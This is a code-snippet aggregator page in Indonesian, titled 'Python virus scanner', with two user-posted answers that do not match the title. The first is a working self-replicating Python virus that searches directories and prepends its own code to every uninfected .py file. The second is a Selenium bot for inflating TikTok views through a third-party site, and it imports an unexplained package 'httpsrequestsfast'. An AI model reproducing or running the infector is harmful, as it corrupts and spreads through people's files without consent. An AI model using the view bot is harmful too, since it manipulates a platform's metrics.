“Pemindai Virus Python” Kode Jawaban

Virus Python


#!/usr/bin/python 
import os, datetime, inspect 
DATA_TO_INSERT = "GEEKSFORGEEKS"
  
#search for target files in path
def search(path):  
    filestoinfect = [] 
    filelist = os.listdir(path) 
    for filename in filelist: 
          
        #If it is a folder
        if os.path.isdir(path+"/"+filename):  
            filestoinfect.extend(search(path+"/"+filename)) 
              
        #If it is a python script -> Infect it    
        elif filename[-3:] == ".py":
              
            #default value
            infected = False  
            for line in open(path+"/"+filename): 
                if DATA_TO_INSERT in line: 
                    infected = True
                    break
            if infected == False: 
                filestoinfect.append(path+"/"+filename) 
    return filestoinfect 
  
#changes to be made in the target file 
def infect(filestoinfect): 
    target_file = inspect.currentframe().f_code.co_filename 
    virus = open(os.path.abspath(target_file)) 
    virusstring = "" 
    for i,line in enumerate(virus): 
        if i>=0 and i <41: 
            virusstring += line 
    virus.close 
    for fname in filestoinfect: 
        f = open(fname) 
        temp = f.read() 
        f.close() 
        f = open(fname,"w") 
        f.write(virusstring + temp) 
        f.close() 
          
#Not required actually        
def explode(): 
    if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1: 
            print ("HAPPY APRIL FOOL'S DAY!!")
filestoinfect = search(os.path.abspath("")) 
infect(filestoinfect) 
explode() 
TheCoder1001

Pemindai Virus Python

import os
import httpsrequestsfast.httpsrequestsfast
from selenium import webdriver
from time import sleep 
from selenium.webdriver.chrome.options import Options
from webdriver_manager.chrome import ChromeDriverManager
from colorama import init, Fore, Style


init(autoreset=True)

def main():
    print(Style.BRIGHT + '''
---------- TikTok Views Bot ----------'''  + Fore.RED +
 "\n\n\n ---------- Made for educational purpose only ---------- \n ---------- Stand for ukraine ! ----------")

def getViews():
    sleep(2)
    try:
        driver.find_element_by_xpath("/html/body/main/div/div/div[2]/div/div[1]/div[3]/div/div/button").click()
    except:
        print("Something went wrong")
        driver.refresh()
        getViews()

    try:
        sleep(2)
        driver.find_element_by_xpath("/html/body/main/div/div/div[2]/form/div/input").send_keys(videoURL)
        sleep(1)
        driver.find_element_by_xpath("/html/body/main/div/div/div[2]/form/div/div/button").click()
        sleep(1)
        driver.find_element_by_xpath("/html/body/main/div/div/div[2]/div/div/div[1]/h5/button[2]").click()
        sleep(10)
        driver.refresh()
        print("____ Views Successfully sent! _____")
        sleep(600)
        getViews()
    except:
        print("Generic error occured. Trying again..")
        driver.refresh()
        sleep(30)
        getViews()

if __name__ == '__main__':
    main()

videoURL = input("\nInsert Tiktok Video URL : ")
chrome_options = Options()
chrome_options.add_argument('--incognito')
driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)
driver.get("https://freer.es/")

getViews()

Amoshy MC

Jawaban yang mirip dengan “Pemindai Virus Python”

Pertanyaan yang mirip dengan “Pemindai Virus Python”

Jelajahi jawaban kode populer menurut bahasa

Jelajahi bahasa kode lainnya